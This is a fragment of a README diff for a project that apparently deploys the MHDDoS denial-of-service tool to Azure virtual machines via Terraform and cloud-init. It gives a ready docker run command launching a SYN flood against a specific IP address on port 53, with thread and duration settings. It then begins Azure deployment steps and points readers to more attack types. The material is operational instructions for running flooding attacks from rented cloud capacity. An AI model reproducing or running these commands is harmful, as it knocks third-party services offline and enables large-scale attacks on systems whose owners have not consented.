djebos/mhddos-azure-terraform/README.md

   - docker run --name mhddos --rm -d djebos/mhddos:latest syn 15.61.23.9:53 100 999999
 # here 'syn 15.61.23.9:53 100 999999' is your attack configuration that fully compliant with original MHDDOS
 ```
 More about types of supported attacks on [MHDDOS oficial page](https://github.com/MHProDev/MHDDoS)
+Save the `cloud-init.yaml` file.

 6. Deploy to the specified azure region (you must be logged in through `az login`).
 Examples:
 ```shell